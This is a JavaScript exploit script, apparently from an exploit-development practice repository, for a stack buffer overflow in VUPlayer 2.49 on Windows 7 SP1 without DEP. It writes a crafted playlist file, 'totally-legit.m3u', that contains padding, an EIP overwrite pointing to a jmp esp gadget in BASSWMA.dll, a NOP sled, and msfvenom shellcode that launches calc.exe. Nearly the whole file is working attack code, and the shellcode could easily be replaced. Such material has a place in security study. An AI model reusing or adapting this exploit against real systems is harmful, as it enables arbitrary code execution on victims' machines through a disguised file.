src/0x07-windows-EDBID-40018-localbof/exploit.js

// Exploit Title: VUPlayer 2.49 - Windows 7 SP1 (no DEP) - .m3u buffer overflow
// Date: 04-02-2019
// Exploit Author: Alan Vivona
// Vendor Homepage: http://vuplayer.com/
// Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe
// Version: VUPlayer <=2.49
// Tested on: Windows 7 SP1 (no DEP)

const fs = require('fs')

const fileName = 'totally-legit.m3u'

const stackSize = 1012
const addressSize = 4 // 4 bytes == 1 address

const nopsled = lenght => '\x90'.repeat(lenght) // 0xcc = nop

const payload = () => {
  // msfvenom -a x86 --platform windows -p windows/exec CMD='calc.exe' -b '\x00\x09\x0a\x0d\x1a\x20' --format python
  buf =  ""
  buf += "\xdd\xc3\xba\xad\xd7\xf1\x1e\xd9\x74\x24\xf4\x5f\x31"
  buf += "\xc9\xb1\x31\x31\x57\x18\x83\xef\xfc\x03\x57\xb9\x35"
  buf += "\x04\xe2\x29\x3b\xe7\x1b\xa9\x5c\x61\xfe\x98\x5c\x15"
  buf += "\x8a\x8a\x6c\x5d\xde\x26\x06\x33\xcb\xbd\x6a\x9c\xfc"
  buf += "\x76\xc0\xfa\x33\x87\x79\x3e\x55\x0b\x80\x13\xb5\x32"
  buf += "\x4b\x66\xb4\x73\xb6\x8b\xe4\x2c\xbc\x3e\x19\x59\x88"
  buf += "\x82\x92\x11\x1c\x83\x47\xe1\x1f\xa2\xd9\x7a\x46\x64"
  buf += "\xdb\xaf\xf2\x2d\xc3\xac\x3f\xe7\x78\x06\xcb\xf6\xa8"
  buf += "\x57\x34\x54\x95\x58\xc7\xa4\xd1\x5e\x38\xd3\x2b\x9d"
  buf += "\xc5\xe4\xef\xdc\x11\x60\xf4\x46\xd1\xd2\xd0\x77\x36"
  buf += "\x84\x93\x7b\xf3\xc2\xfc\x9f\x02\x06\x77\x9b\x8f\xa9"
  buf += "\x58\x2a\xcb\x8d\x7c\x77\x8f\xac\x25\xdd\x7e\xd0\x36"
  buf += "\xbe\xdf\x74\x3c\x52\x0b\x05\x1f\x38\xca\x9b\x25\x0e"
  buf += "\xcc\xa3\x25\x3e\xa5\x92\xae\xd1\xb2\x2a\x65\x96\x4d"
  buf += "\x61\x24\xbe\xc5\x2c\xbc\x83\x8b\xce\x6a\xc7\xb5\x4c"
  buf += "\x9f\xb7\x41\x4c\xea\xb2\x0e\xca\x06\xce\x1f\xbf\x28"
  buf += "\x7d\x1f\xea\x4a\xe0\xb3\x76\xa3\x87\x33\x1c\xbb"
  return buf
}

let buf = ''
buf += 'A'.repeat(stackSize) // overflow
// overrides EIP with Address :  0x1010539f => jmp esp
// found with immunity by issuing the command : !searchcode: jmp esp
// the address is on a PAGE_EXECUTE_READ at BASSWMA.dll
buf += "\x9f\x53\x10\x10"
buf += nopsled(addressSize*4) // just in case, not mandatory
buf += payload()

fs.writeFile(`./${fileName}`, buf, 'binary', () => console.log(`Done! > ${fileName}`))